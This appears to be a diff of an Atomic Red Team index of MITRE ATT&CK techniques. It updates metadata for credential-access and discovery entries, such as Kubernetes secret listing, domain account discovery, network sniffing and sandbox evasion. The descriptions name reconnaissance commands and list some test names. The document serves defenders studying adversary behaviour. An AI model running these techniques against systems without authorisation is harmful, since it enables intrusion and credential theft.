+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -53833,9 +54553,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -53866,7 +54585,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -53890,8 +54609,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -53956,7 +54673,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests:
     - name: System Owner/User Discovery
@@ -53976,7 +54692,7 @@ discovery:
         name: sh
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -54035,7 +54751,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -54056,7 +54771,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -54077,8 +54792,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests:
     - name: Check internet connection using ping freebsd, linux or macos
@@ -54103,7 +54816,7 @@ discovery:
           '
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -54126,15 +54839,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -54160,13 +54872,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -54191,12 +54902,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -54238,13 +54948,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -54305,12 +55014,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -54374,19 +55082,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -54433,7 +55140,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -54500,7 +55206,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests:
     - name: View sudoers access
@@ -54600,7 +55305,7 @@ discovery:
         name: sh
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -54690,13 +55395,12 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (MacOS)
@@ -54718,7 +55422,7 @@ discovery:
           '
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -54761,12 +55465,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -54807,12 +55510,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -54897,7 +55599,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture macOS using tcpdump or tshark
@@ -55070,7 +55771,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests:
     - name: Network Share Discovery
@@ -55093,7 +55793,7 @@ discovery:
         name: sh
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -55144,12 +55844,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -55160,7 +55859,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -55175,7 +55873,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -55223,7 +55920,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests:
     - name: System Information Discovery
@@ -55384,12 +56082,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -55431,122 +56128,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -55561,6 +56209,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -55570,9 +56224,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -55582,8 +56241,44 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -55612,91 +56307,90 @@ discovery:
         name: sh
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
